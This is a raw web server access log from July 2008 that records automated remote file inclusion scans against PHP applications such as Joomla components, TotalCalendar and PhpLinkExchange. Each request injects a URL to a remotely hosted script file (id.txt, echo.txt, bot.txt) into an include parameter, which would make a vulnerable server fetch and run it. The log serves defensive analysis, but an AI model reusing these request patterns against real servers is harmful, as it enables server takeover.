202.181.105.117 - - [19/Jul/2008:11:58:59 -0700] "GET /logs/access_080528.log//trans/trans.php?trans=fr&page=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:00 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:00 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:00 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:01 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:12 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:13 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:13 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:15 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:15 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:16 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:59:19 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.215 - - [19/Jul/2008:11:59:23 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:31 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:31 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:31 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:11:59:44 -0700] "GET /logs/access_080128.log/modules/My_eGallery/index.php?basepath=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:59:48 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:59:49 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 200 18473 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:56 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:56 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:11:59:56 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:59 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:59 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:11:59:59 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:00 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:00 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:00 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:05 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:05 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:05 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:05 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:05 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:14 -0700] "GET //index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 18441 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:14 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:15 -0700] "GET //index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 200 18457 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:15 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:15 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:16 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.158.0.5 - - [19/Jul/2008:12:00:16 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:12:00:16 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.65" "www.dmulk.com"
213.92.85.234 - - [19/Jul/2008:12:00:22 -0700] "GET /logs/access_080123.log%20//modules/TotalCalendar/about.php?inc_dir=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Jul/2008:12:00:22 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.92.85.234 - - [19/Jul/2008:12:00:22 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:12:00:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:12:00:24 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:12:00:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.17.3.212 - - [19/Jul/2008:12:00:24 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:12:00:26 -0700] "GET /?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 200 18429 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:00:27 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:00:28 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:00:28 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:35 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:35 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:00:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [19/Jul/2008:12:00:35 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:35 -0700] "GET /logs/access_080313.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:35 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [19/Jul/2008:12:00:35 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:00:36 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [19/Jul/2008:12:00:36 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:12:00:46 -0700] "GET /logs/access_080207.log//faqsupport/samplefaqsupport.php?path[docroot]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:12:00:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:12:00:46 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:12:00:47 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:12:00:48 -0700] "GET /logs/?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 200 56851 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:12:00:48 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:12:00:49 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.36.231.160 - - [19/Jul/2008:12:00:49 -0700] "GET /?sourcedir=http://zenyth.angelfire.com/scan/echo.txt???? HTTP/1.1" 200 18413 "-" "libwww-perl/5.65" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:12:00:56 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:12:00:56 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:12:00:56 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:12:00:56 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:12:01:03 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:12:01:05 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 200 18543 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [19/Jul/2008:12:01:05 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:01:07 -0700] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:12:01:13 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:12:01:17 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:01:17 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:01:17 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:01:17 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.40.34.134 - - [19/Jul/2008:12:01:22 -0700] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.201.18 - - [19/Jul/2008:12:01:28 -0700] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
87.10.173.218 - - [19/Jul/2008:12:01:28 -0700] "GET /logs/homepage.php?sel=www.google.it? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.10.173.218 - - [19/Jul/2008:12:01:29 -0700] "GET /homepage.php?sel=www.google.it? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:12:01:29 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:12:01:30 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.brazebo.it/echo.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.60.69.243 - - [19/Jul/2008:12:01:45 -0700] "GET /logs/access_080315.log/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.60.69.243 - - [19/Jul/2008:12:01:46 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.60.69.243 - - [19/Jul/2008:12:01:46 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lei.crt-limousin.fr/ortl/lag/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:03 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:03 -0700] "GET /logs/access_080128.log//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:03 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:03 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:04 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.144 - - [19/Jul/2008:12:02:04 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.214.192.29 - - [19/Jul/2008:12:02:05 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [19/Jul/2008:12:02:07 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_remository&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.6olab.com/components/com_remository_files/file_image_26/idnews.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.808" "www.dmulk.com" 88.214.1